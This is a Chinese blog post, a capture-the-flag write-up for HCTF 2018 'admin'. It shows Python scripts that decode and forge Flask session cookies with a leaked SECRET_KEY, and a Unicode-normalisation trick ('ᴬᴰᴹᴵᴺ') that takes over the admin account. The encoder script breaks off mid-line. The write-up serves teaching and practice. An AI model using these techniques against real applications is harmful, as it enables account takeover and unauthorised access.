HCTF 2018admin ——flask session伪造unicode伪造

最新推荐文章于 2022-10-18 20:21:04 发布
最新推荐文章于 2022-10-18 20:21:04 发布
阅读量321 收藏
点赞数 1
分类专栏: ctfWP 文章标签: 安全 unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/113784078
版权

[HCTF 2018]admin ——flask session伪造||unicode伪造

  • 猜测要么从url栏,要么从注册登录部分注入

  • 猜admin的密码 123,对了本题结束。

  • 如果按照完整解这个题

  • 查看源代码,发现新提示

  • 其余没有提示,先注册账号并登录

  • 更新了新的change password 和post页面

  • 在change password发现新提示

  • 注册从bp抓包入手

  • admin不能注册

  • 但是发现报文里有session所以不能暴力破解admin的密码

  • 解法一:flask session伪造

  • flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。

  • session解密脚本

    #!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')
    return session_json_serializer.loads(payload)
if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

  • 但是如果想要伪造session还需要SECRET_KEY,在config.py里发现了SECRET_KEY

  • 用session加密算法再伪造一个name为admin的session提交试一下

  • 加密脚本

    #!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'
# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast
# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod
# Lib for argument parsing
import argparse
# external Imports
from flask.sessions import SecureCookieSessionInterface
class MockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key
if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)
                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)
                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value
                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]
                    data = payload.split(".")[0]
                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)
                    return data
                else:
                    app = MockApp(secret_key)
                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)
                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)
                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)
                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value
                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]
                    data = payload.split(".")[0]
                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)
                    return data
                else:
                    app = MockApp(secret_key)
                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)
                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")
    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='

  • 得到的session

  • 发现服务器只验证了session解密后的user是不是admin ,是则返回flag

  • flag{ae1beceb-d42d-4431-8c1a-3f87803d1152}

  • 解法二:Unicode欺骗

  • route.py文件中发现在修改密码的时候先将name转成小写

  • 看一下注册和登录,都用strlower()来转小写,但是python中已经自带转小写函数lower(),看看有什么不一样的

    def strlower(username): username = nodeprep.prepare(username) return username

  • 这里用的nodeprep.prepare函数,而nodeprep是从Twisted模块导入的,在requirements.txt文件中发现Twisted==10.2.0,而官网最新已经到了19.7.0(2019/9),版本差距很大,应该会存在漏洞。

  • 使用nodeprep.prepare函数转换时过程如下ᴬᴰᴹᴵᴺ -> ADMIN -> admin

  • 假如我们注册ᴬᴰᴹᴵᴺ用户,然后在用ᴬᴰᴹᴵᴺ用户登录,因为在login函数里使用了一次nodeprep.prepare函数,因此我们登录上去看到的用户名为ADMIN,此时我们再修改密码,又调用了一次nodeprep.prepare函数将name转换为admin,然后我们就可以改掉admin的密码,最后利用admin账号登录即可拿到flag。

  • 参考文章:

https://www.cnblogs.com/plf-Jack/p/11105228.html

https://www.cnblogs.com/chrysanthemum/p/11722351.html

https://blog.csdn.net/weixin_44677409/article/details/100733581

HCTF2018-admin三种解法复现:https://blog.csdn.net/weixin_44677409/article/details/100733581

Python Web之flask session&格式化字符串漏洞:https://xz.aliyun.com/t/3569#toc-0

unicode 欺骗:[https://panda1g1.github.io/2018/11/15/HCTF%20admin/](https://panda1g1.github.io/2018/11/15/HCTF admin/)

4pri1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HCTF 2018]admin
夜幕下的灯火阑珊的博客
05-12 940
知识点 unicode欺骗 session伪造 解法一:unicode欺骗 查看源码发现 <!-- you are not admin --> 应该是要注册成admin用户 先注册一个admin1用户,登录后在change password页面查看源码,发现 <!-- https://github.com/woadsl1234/hctf_flask/ --> 访问后可取得源码,部分源码如下 def change(): if not current_user.is_
flask session伪造
SwBack的博客
07-31 637
通过CTF题目进行学习首先打开题目,查看源代码发下如下注(提)释(示)看到这个,有经验的大佬们估计可以猜到,八成这题就是要伪造admin登录习惯性尝试一波弱口令,admin/admin admin/123456 结果肯定是失败的,随便注册一个账号登录登录,查看页面的功能及源代码,是否存在提示在change页面发现源代码地址看到flask,在根据之前的注释,想到考点应该是flask cookie伪造...
Flasksession伪造
TenG的博客
05-22 3836
前言 本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过就没做出来,还是有点遗憾的。但比较戏剧性的是,上午比赛刚结束,下午刷BUU的时候就遇到了同样的题目。嗐,还是自己太菜,下面就结合BUUCTF中的[HCTF 2018]admin来说一下,文中比较拙劣的地方还请师傅们指正一下。参考文章 正文 本来这个题是有三种解法的,分别是:flask session伪造、Un
Flask中的session伪造
m0_60716947的博客
10-18 1127
flasksession伪造
[HCTF 2018]adminflask session伪造Unicode欺骗)
qq_44657899的博客
03-01 2656
先随便注册一个账号进去看看。 在index的源码处找到提示,you are not admin,估计是要用admin的身份登录才会有flag。 然后在change的源码找到了网站项目的github地址: 下载下来是一个flask项目,这里看了看wp知道要看路由route.py,然而我这种菜鸡是看不懂的。 有三种解题方法,不过看其他wp第三种都没有实现。 一,flask session伪造: 这...
基于Flask框架的小说爬取源码实现——Flask_Spider
最新发布
03-25
项目名称:Flask_Spider - 基于Flask框架的小说爬取平台 技术栈:主要以Python为核心语言,辅以HTML, CSS, Shell, JavaScript等多语言支持。 项目构成:共计52个文件,具体分布如下: - Python源文件(.py):23个...
基于python——flask框架的问答发布网站
02-17
实现了验证码注册登录功能,发帖,评论等基本功能,有待大神完善,欢迎大神指教
Flaskflask-session的具体使用
09-20
Flask框架中,session管理是一个重要的功能,它允许开发者在用户的不同请求之间保持状态。然而,Flask的默认实现仅使用签名cookie来保存session数据,这可能不满足所有需求。`flask-session`扩展提供了解决方案,...
python期末项目——flask+dash项目.zip
03-05
—— 博主领域:嵌入式领域&人工智能&软件开发。 有任何使用问题欢迎随时与博主沟通(公主呺:阿齐Archie)。 # 注意 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担。 2. 部分字体以及...
flask session组件的使用示例
09-19
主要介绍了flask session组件的使用示例,详细介绍内置session以及第三方session组件的使用方法以及处理机制,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Flasksession伪造(从某平台学习Session身份伪造)
Y4tacker的博客
08-02 1万+
文章目录工具介绍FLASK解密FLASK加密脚本 工具介绍 FLASK解密 不推荐网上那个,反而这个倒是挺好用 #!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payl
flask中的session伪造问题
m0_62422842的博客
09-05 2555
flask中的session伪造问题,涉及两道ctf题目,一道主要考察session伪造,另一道session伪造与py反序列化结合考察。
HCTF 2018 admin
BlueDoorZz的博客
07-12 481
0x00 题目类型:unicode欺骗,源码泄露,session伪造,条件竞争(Maybe)。 0x01 题目索引界面有登录与注册两个功能,查看源码注释中有you are not admin字样,可能要求以admin身份登陆。先注册一个账号,看看有没有有用的信息。 在改密码的界面发现源码泄漏,去github看源码。源码较长,截取关键部分。 @app.route('/register', methods = ['GET', 'POST']) def register(): if cu
[HCTF 2018]admin
她叫常玉莹
04-21 2427
来到题目的主页面,看到主页右面有一个下拉框,有登陆,注册功能,注册个用户再说,登陆后有编辑、更改密码、登出功能。 源码中hint提示不是admin,题目肯定是想让我们登陆admin用户,在更改密码页面源码中有一个github地址,去看一下github 是一个flask项目下载下来审计一下,先看下路由routes.py index函数 @app.route('/') @app.route('/index') def index(): return render_template('index.ht
HCTF2018-admin
热门推荐
迷风小白
09-11 1万+
前言 在BUUCTF上看到这题存在三种解法,感觉比较经典,就想着来复现一下顺便学习一波。存在以下三种解法: flask session 伪造 unicode欺骗 条件竞争 审题 拿到题目发现一共就登录注册两个功能,随便注册一个test/test用户 登录之后查看源码发现提示<!-- you are not admin -->,根据提示和题目名估计要让我们登录admin用户就可以得...
[原题复现]2018HCTF WEB admin(session伪造unicode漏洞、条件竞争)
笑花大王
02-09 2396
简介 原题复现:https://github.com/woadsl1234/HCTF2018_admin 考察知识点:session伪造unicode漏洞、条件竞争 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 第一个方法: 打开界面先查看了源码提示 you are not admin 我不是ad...
unicode欺骗—— hctf - admin
ancan8807的博客
09-07 736
查看源代码,发现<!-- you are not admin --> 提示要以管理员身份登陆 尝试注册管理员账号,提示The username has been registered 于是尝试随便注册一个账号,发现注册成功,并能够登陆 根据页面提示,猜测是通过更改admin账号的密码获取flag 于是进入change password界面,读取源码 发现提示...
【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1791
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
[GYCTF2020]FlaskApp
SopRomeo的博客
05-01 2906
随便输个东西,发现他输出了base64加密的内容,根据提示FLASKAPP, 直接输入{{2+2}} base64解密后发现是4 模板注入题目 试了很多poc,都没啥用… 看了web 预期解 利用PIN码进行RCE 通过base64解密报错我们读取到文件的名字(说明开启了Debug模式,并泄露了decode路由的源码) 接着读取文件内容 paylaod {% for c in [].__clas...
flask session
06-07
Flask sessionFlask 框架提供的一种机制,用于在不同请求之间存储和共享数据。它使用一个加密的 cookie 来存储数据,这样即使 cookie 被窃取,也无法读取其中的数据。通过 flask.session 对象可以轻松地设置和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值